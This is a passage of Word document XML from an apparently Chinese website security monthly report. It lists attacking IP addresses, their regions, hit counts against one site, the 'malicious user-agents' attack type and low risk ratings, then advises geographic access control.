              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>恶意user-agents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击总量较上月，攻击占比</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>低</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>47.112.193.218</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>中国广东深圳阿里云/电信/联通/移动/铁通/教育网</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>www.dingxinsec.com.cn:443(34)、www.dingxinsec.com.cn(2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击总量较上月，攻击占比</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>低</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>124.71.107.29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>中国香港</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>www.dingxinsec.com.cn(28)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>恶意user-agents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击总量较上月，攻击占比</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>低</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>206.253.164.182</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>美国arachnitec.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>www.dingxinsec.com.cn(28)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>恶意user-agents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击总量较上月，攻击占比</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>低</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>89.40.73.14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>罗马尼亚</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>www.dingxinsec.com.cn(25)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>恶意user-agents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击总量较上月，攻击占比</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>低</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>103.194.186.202</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>中国香港eplushost.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>www.dingxinsec.com.cn(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>恶意user-agents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击总量较上月，攻击占比</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>低</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>119.29.119.174</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>中国广东广州电信/联通/移动</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>www.dingxinsec.com.cn(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>恶意user-agents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击总量较上月，攻击占比</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>低</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>154.39.251.173</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>美国cogentco.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>www.dingxinsec.com.cn(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>恶意user-agents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击总量较上月，攻击占比</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>低</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidP="00EA311D" w:rsidR="00980B78" w:rsidRDefault="00980B78" w:rsidRPr="00D96623">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D96623">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="00B22C0B" w:rsidRDefault="00B22C0B" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc518464543"/>
      <w:bookmarkStart w:id="20" w:name="_Toc531180268"/>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击区域详情分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="005379B7" w:rsidRDefault="005379B7" w:rsidRPr="00EA311D">
      <w:pPr>
        <w:pStyle w:val="147147"/>
        <w:spacing w:after="0" w:afterLines="0" w:before="0" w:beforeLines="0"/>
        <w:ind w:firstLine="400" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA311D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>根据风暴中心数据大脑安全分析，境外攻击源主要是通过肉鸡、跳板机对网站发起恶意攻击。若网站主要访问源集中在境内，建议打开区域访问控制，限制国外地区进行访问，保障网站安全，具体攻击区域分布见下图：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidP="00EA311D" w:rsidR="005379B7" w:rsidRDefault="005379B7" w:rsidRPr="00D96623">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle11"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D96623">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distR="0">
            <wp:extent cx="5274310" cy="3178575"/>
            <wp:effectExtent l="19050" t="0" r="21590" b="0"/>
            <wp:docPr id="1" name="Chart 1"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
                <c:chart xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" r:id="rId15"/>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8300" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4"/>
          <w:left w:val="single" w:sz="4"/>
          <w:bottom w:val="single" w:sz="4"/>
          <w:right w:val="single" w:sz="4"/>
          <w:insideH w:val="single" w:sz="4"/>
          <w:insideV w:val="single" w:sz="4"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="664"/>
        <w:gridCol w:w="996"/>
        <w:gridCol w:w="2822"/>
        <w:gridCol w:w="913"/>
        <w:gridCol w:w="913"/>
        <w:gridCol w:w="1992"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>序号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>区域</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>主要集中IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击次数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
